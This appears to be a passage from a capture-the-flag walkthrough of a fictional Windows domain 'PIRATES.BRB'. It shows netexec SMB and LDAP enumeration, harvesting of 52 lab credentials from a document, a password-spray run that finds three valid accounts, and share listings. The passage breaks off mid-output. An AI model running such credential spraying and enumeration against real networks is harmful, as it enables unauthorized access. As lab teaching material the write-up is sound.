oxdf@hacky$ netexec smb flyingdutchman.pirates.brb -u oxdf -p oxdf --shares
SMB 10.2.10.13 445 FLYINGDUTCHMAN [*] Windows Server 2022 Build 20348 x64 (name:FLYINGDUTCHMAN) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.13 445 FLYINGDUTCHMAN [-] PIRATES.BRB\oxdf:oxdf STATUS_LOGON_FAILURE
SMB signing is disabled, which means this server would be vulnerable to a relay attack.
Initial Credentials
Access Print Jobs
On the JOLLYROGER web page I found the obfuscated admin password. Visiting /scan pops HTTP auth, and the creds work there, showing a page that lists the files:
There are 131 files here! There’s a .htaccess file, but it doesn’t match up with the behavior for /scan:
# Prevent directory listing
Options -Indexes
# Deny access to all files by default
<Files "*">
Order allow,deny
Deny from all
</Files>
# Optional: Custom error page for forbidden access
ErrorDocument 403 "Access denied. Contact IT support for document access."
# Optional: Redirect to main page instead of showing error
# RedirectMatch 403 ^/scan/.*$ /index.html
Perhaps this page is reading from another directory, or maybe something else is configuring the access.
Based on the file names, the other files consist of:
- 67 PDFs (
.pdf) - 24 Word documents (
.docx) - 29 Excel workbooks (
.xlsx) - 10 PowerPoint presentations (
.pptx)
However, the file sizes are all too small to be these document types. When sorted by size, all but one of the docs are less than 175 bytes:
Other than IT_Procedures.docx, the rest are too small to be the format indicated by their extensions. For example, Quality_Standards.docx:
The PDFs don’t open in the browser nicely because it tries to render them as PDFs, but the others open to show the text.
IT_Procedures.docx is also just text, but it’s much longer:
I’ll save a copy. There are initial creds for 52 users on the network:
oxdf@hacky$ cat IT_Procedures.txt | grep Username: | wc -l
52
Credential Check
I’ll create files holding the usernames and passwords:
oxdf@hacky$ cat IT_Procedures.txt | grep Username: | cut -d' ' -f2 > usernames
oxdf@hacky$ cat IT_Procedures.txt | grep Password: | cut -d' ' -f3 > passwords
oxdf@hacky$ wc -l usernames passwords
52 usernames
52 passwords
104 total
I’ll brute force with netexec to see if any work on the domain:
oxdf@hacky$ netexec smb blackpearl.pirates.brb -u usernames -p passwords --no-bruteforce --continue-on-success
SMB 10.2.10.10 445 BLACKPEARL [*] Windows Server 2022 Build 20348 x64 (name:BLACKPEARL) (domain:PIRATES.BRB) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\blackbeard:TempPass2024!@# STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\ruby:NewHire789$%^ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\jack:Welcome123!&* STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\anne:FirstLogin456#$ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\longjohn:Initial789@!% STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\calico:Setup321^&* STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\oneeye:Begin654$#@ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\sparrow:Start987!@# STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\cutlass:Access147*&^ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\hook:Login258%$# STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [+] PIRATES.BRB\morgan:Entry369@!*
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\flint:Password741!@# STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\silver:Temp852$%^ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\bones:New963!&* STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\compass:Init159#$% STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\cannon:First357@!* STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\galleon:Setup486^&$ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\kraken:Begin753*#@ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\treasure:Start642!%^ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\parrot:Access951$@# STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\pegleg:Login824&*! STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\rumrunner:Entry573#$% STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\seabiscuit:Pass416!@* STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\horizon:Temp792$^& STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\mack:New685!#% STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\seafox:Init348@$* STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [+] PIRATES.BRB\barnacle:First927&^!
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\corsair:Setup164$%# STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\madeye:Begin583*!@ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\sharktooth:Start739^&# STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\sable:Access295$!* STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\stormy:Login476#@% STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\ghost:Entry618!^& STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\reef:Pass857$*# STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\brine:Temp423@!% STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\captainmorgan:New694^&$ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\blacktail:Init715!#* STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\redbeard:First382$%@ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\ironhook:Setup549&!^ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\saltydog:Begin826#$* STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\pegasus:Start173!@% STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\rumcutter:Access497^&$ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\stormbreaker:Login635$!# STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [+] PIRATES.BRB\plankwalker:Entry284*@&
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\seadog:Pass916!%^ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\reefwalker:Temp548#$@ STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\crowsnest:New729&*! STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\stormcloud:Init367$^% STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\harpoon:First894!@# STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\cutthroat:Setup152%&* STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\lagoon:|oJgt5L>)5vX STATUS_LOGON_FAILURE
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\captainsparrow:Start683^@& STATUS_LOGON_FAILURE
Three still work:
| Username | Password | Department | Access Level |
|---|---|---|---|
| morgan | Entry369@!* | Command Deck | Second Mate |
| barnacle | First927&^! | Trade & Commerce | Port Agent |
| plankwalker | Entry284*@& | Command Deck | Fleet Admiral |
They also show up in nxcdb:
nxcdb (pirates.brb) > proto smb
nxcdb (pirates.brb)(smb) > creds
+Credentials---------+-----------+-------------+-------------+-------------+
| CredID | Admin On | CredType | Domain | UserName | Password |
+--------+-----------+-----------+-------------+-------------+-------------+
| 1 | 0 Host(s) | plaintext | PIRATES.BRB | morgan | Entry369@!* |
| 2 | 0 Host(s) | plaintext | PIRATES.BRB | barnacle | First927&^! |
| 3 | 0 Host(s) | plaintext | PIRATES.BRB | plankwalker | Entry284*@& |
+--------+-----------+-----------+-------------+-------------+-------------+
Authenticated Enumeration
SMB
MAQ
A quick check that will be useful later is the Machine Account Quota. This is the number of machines that a user can add to the domain:
oxdf@hacky$ netexec ldap blackpearl.pirates.brb -id 1 -M maq
LDAP 10.2.10.10 389 BLACKPEARL [*] Windows Server 2022 Build 20348 (name:BLACKPEARL) (domain:PIRATES.BRB) (signing:None) (channel binding:No TLS cert)
LDAP 10.2.10.10 389 BLACKPEARL [+] PIRATES.BRB\morgan:Entry369@!*
MAQ 10.2.10.10 389 BLACKPEARL [*] Getting the MachineAccountQuota
MAQ 10.2.10.10 389 BLACKPEARL MachineAccountQuota: 0
Here it is 0, which means standard users can’t add machines to the domain.
Shares
For each host, I’ll check the SMB shares available:
oxdf@hacky$ netexec smb blackpearl.pirates.brb jollyroger.pirates.brb queenrev.pirates.brb flyingdutchman.pirates.brb -u morgan -p 'Entry369@!*' --shares
SMB 10.2.10.11 445 JOLLYROGER [*] Windows Server 2022 Build 20348 x64 (name:JOLLYROGER) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.13 445 FLYINGDUTCHMAN [*] Windows Server 2022 Build 20348 x64 (name:FLYINGDUTCHMAN) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.10 445 BLACKPEARL [*] Windows Server 2022 Build 20348 x64 (name:BLACKPEARL) (domain:PIRATES.BRB) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.2.10.12 445 QUEENREV [*] Windows Server 2022 Build 20348 x64 (name:QUEENREV) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.11 445 JOLLYROGER [+] PIRATES.BRB\morgan:Entry369@!*
SMB 10.2.10.13 445 FLYINGDUTCHMAN [+] PIRATES.BRB\morgan:Entry369@!*
SMB 10.2.10.11 445 JOLLYROGER [*] Enumerated shares
SMB 10.2.10.11 445 JOLLYROGER Share Permissions Remark
SMB 10.2.10.11 445 JOLLYROGER ----- ----------- ------
SMB 10.2.10.11 445 JOLLYROGER ADMIN$ Remote Admin
SMB 10.2.10.11 445 JOLLYROGER C$ Default share
SMB 10.2.10.11 445 JOLLYROGER IPC$ READ Remote IPC
SMB 10.2.10.11 445 JOLLYROGER TREASOR_HUNT Share TREASOR_HUNT
SMB 10.2.10.10 445 BLACKPEARL [+] PIRATES.BRB\morgan:Entry369@!*
SMB 10.2.10.13 445 FLYINGDUTCHMAN [*] Enumerated shares
SMB 10.2.10.13 445 FLYINGDUTCHMAN Share Permissions Remark
SMB 10.2.10.13 445 FLYINGDUTCHMAN ----- ----------- ------
SMB 10.2.10.13 445 FLYINGDUTCHMAN ADMIN$ Remote Admin
SMB 10.2.10.13 445 FLYINGDUTCHMAN C$ Default share
SMB 10.2.10.13 445 FLYINGDUTCHMAN IPC$ READ Remote IPC
SMB 10.2.10.12 445 QUEENREV [+] PIRATES.BRB\morgan:Entry369@!*
SMB 10.2.10.12 445 QUEENREV [*] Enumerated shares
SMB 10.2.10.12 445 QUEENREV Share Permissions Remark
SMB 10.2.10.12 445 QUEENREV ----- ----------- ------
SMB 10.2.10.12 445 QUEENREV ADMIN$ Remote Admin
SMB 10.2.10.12 445 QUEENREV C$ Default share
SMB 10.2.10.12 445 QUEENREV IPC$ READ Remote IPC
SMB 10.2.10.12 445 QUEENREV ISLAND2 Island 2 Share
SMB 10.2.10.10 445 BLACKPEARL [*] Enumerated shares
SMB 10.2.10.10 445 BLACKPEARL Share Permissions Remark
SMB 10.2.10.10 445 BLACKPEARL ----- ----------- ------
SMB 10.2.10.10 445 BLACKPEARL ADMIN$ Remote Admin
SMB 10.2.10.10 445 BLACKPEARL C$ Default share
SMB 10.2.10.10 445 BLACKPEARL IPC$ READ Remote IPC
SMB 10.2.10.10 445 BLACKPEARL NETLOGON READ Logon server share
SMB 10.2.10.10 445 BLACKPEARL SYSVOL READ Logon server share
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
I can run that same command giving the CredId for the credential in the current workspace:
oxdf@hacky$ netexec smb blackpearl.pirates.brb jollyroger.pirates.brb queenrev.pirates.brb flyingdutchman.pirates.brb -id 1 --shares
SMB 10.2.10.10 445 BLACKPEARL [*] Windows Server 2022 Build 20348 x64 (name:BLACKPEARL) (domain:PIRATES.BRB) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.2.10.12 445 QUEENREV [*] Windows Server 2022 Build 20348 x64 (name:QUEENREV) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.13 445 FLYINGDUTCHMAN [*] Windows Server 2022 Build 20348 x64 (name:FLYINGDUTCHMAN) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.11 445 JOLLYROGER [*] Windows Server 2022 Build 20348 x64 (name:JOLLYROGER) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.10 445 BLACKPEARL [+] PIRATES.BRB\morgan:Entry369@!*
SMB 10.2.10.12 445 QUEENREV [+] PIRATES.BRB\morgan:Entry369@!*
SMB 10.2.10.13 445 FLYINGDUTCHMAN [+] PIRATES.BRB\morgan:Entry369@!*
SMB 10.2.10.12 445 QUEENREV [*] Enumerated shares
SMB 10.2.10.12 445 QUEENREV Share Permissions Remark
SMB 10.2.10.12 445 QUEENREV ----- ----------- ------
SMB 10.2.10.12 445 QUEENREV ADMIN$ Remote Admin
SMB 10.2.10.12 445 QUEENREV C$ Default share
SMB 10.2.10.12 445 QUEENREV IPC$ READ Remote IPC
SMB 10.2.10.12 445 QUEENREV ISLAND2 Island 2 Share
SMB 10.2.10.11 445 JOLLYROGER [+] PIRATES.BRB\morgan:Entry369@!*
SMB 10.2.10.10 445 BLACKPEARL [*] Enumerated shares
SMB 10.2.10.10 445 BLACKPEARL Share Permissions Remark
SMB 10.2.10.10 445 BLACKPEARL ----- ----------- ------
SMB 10.2.10.10 445 BLACKPEARL ADMIN$ Remote Admin
SMB 10.2.10.10 445 BLACKPEARL C$ Default share
SMB 10.2.10.10 445 BLACKPEARL IPC$ READ Remote IPC
SMB 10.2.10.10 445 BLACKPEARL NETLOGON READ Logon server share
SMB 10.2.10.10 445 BLACKPEARL SYSVOL READ Logon server share
SMB 10.2.10.13 445 FLYINGDUTCHMAN [*] Enumerated shares
SMB 10.2.10.13 445 FLYINGDUTCHMAN Share Permissions Remark
SMB 10.2.10.13 445 FLYINGDUTCHMAN ----- ----------- ------
SMB 10.2.10.13 445 FLYINGDUTCHMAN ADMIN$ Remote Admin
SMB 10.2.10.13 445 FLYINGDUTCHMAN C$ Default share
SMB 10.2.10.13 445 FLYINGDUTCHMAN IPC$ READ Remote IPC
SMB 10.2.10.11 445 JOLLYROGER [*] Enumerated shares
SMB 10.2.10.11 445 JOLLYROGER Share Permissions Remark
SMB 10.2.10.11 445 JOLLYROGER ----- ----------- ------
SMB 10.2.10.11 445 JOLLYROGER ADMIN$ Remote Admin
SMB 10.2.10.11 445 JOLLYROGER C$ Default share
SMB 10.2.10.11 445 JOLLYROGER IPC$ READ Remote IPC
SMB 10.2.10.11 445 JOLLYROGER TREASOR_HUNT Share TREASOR_HUNT
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
I’ll run the same command with the other two sets of creds, which shows the same shares. The only difference is that barnacle has read and write access to the TREASURE_HUNT share:
SMB 10.2.10.11 445 JOLLYROGER [*] Enumerated shares
SMB 10.2.10.11 445 JOLLYROGER Share Permissions Remark
SMB 10.2.10.1